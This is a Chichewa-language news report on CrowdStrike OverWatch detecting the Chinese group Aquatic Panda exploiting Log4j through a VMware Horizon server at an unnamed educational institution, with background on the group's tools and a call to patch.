Aquatic Panda, gulu lachi China lobera, lagwiritsa ntchito mwachindunji chiopsezo cha Log4j kuukira sukulu yosadziwika bwino. Kuukiraku kudapezeka ndikutsutsidwa ndi akatswiri owopseza a CrowdStrike's Overwatch.
Malinga ndi a CrowdStrike, achifwamba aku China (boma) adayambitsa chiwembu pasukulu ina yomwe sinatchulidwe dzina pogwiritsa ntchito chiopsezo cha Log4j. Chiwopsezo ichi chidapezeka pachiwopsezo cha VMware Horizon cha bungwe lomwe lakhudzidwa.
VMware Horizon chitsanzo
Osaka ziwopsezo a CrowdStrike adazindikira zachiwembucho ataona anthu akukayikitsa kuchokera ku Tomcat yomwe ikuyenda pansi pa zomwe zidakhudzidwa. Anayang'anira kuchuluka kwa magalimotowa ndipo adatsimikiza kuchokera pa telemetry kuti mtundu wosinthidwa wa Log4j ukugwiritsidwa ntchito kulowa mu seva. Obera aku China adachita chiwembuchi pogwiritsa ntchito pulojekiti yapagulu ya GitHub yomwe idasindikizidwa pa Disembala 13.
Kuyang'aniranso ntchito yobera kudawonetsa kuti obera a Aquatic Panda amagwiritsa ntchito ma binaries amtundu wa OS kuti amvetsetse mwayi ndi zina zambiri zamakina ndi chilengedwe. Akatswiri a CrowdStrike adapezanso kuti achiwembuwa amayesa kuletsa ntchito ya gulu lachitatu lozindikira komanso kuyankha (EDR).
Akatswiri a OverWatch adapitilizabe kuyang'anira zochitika za oberawo ndipo adatha kudziwitsa bungwe lomwe likufunsidwa za momwe kuberako kukuyendera. Bungwe la maphunziro likhoza kuchitapo kanthu pa izi ndikuchitapo kanthu koyenera kuwongolera ndikuyika ntchito yomwe ili pachiwopsezo.
Aquatic Panda Hackers
Gulu lachi China la Aquatic Panda lakhala likugwira ntchito kuyambira Meyi 2020. Obera amayang'ana kwambiri kusonkhanitsa anthu anzeru komanso ukazitape wamakampani. Poyamba, gululi limayang'ana kwambiri makampani omwe ali mgulu la telecom, gawo laukadaulo komanso maboma.
Obera amagwiritsa ntchito zida zomwe zimatchedwa kuti Cobalt Strike zida, kuphatikiza otsitsa apadera a Cobalt Strike Fishmaster. Obera achi China amagwiritsanso ntchito njira monga zolipira za njRAt kuti akwaniritse zolinga.
Kuyang'anira Log4j ndikofunikira
Poyankha izi, CrowdStrike inanena kuti kusatetezeka kwa Log4j ndi ntchito yowopsa kwambiri ndipo makampani ndi mabungwe angachite bwino kuyang'anira kafukufuku wawo ndikuwongoleranso machitidwe awo pachiwopsezochi.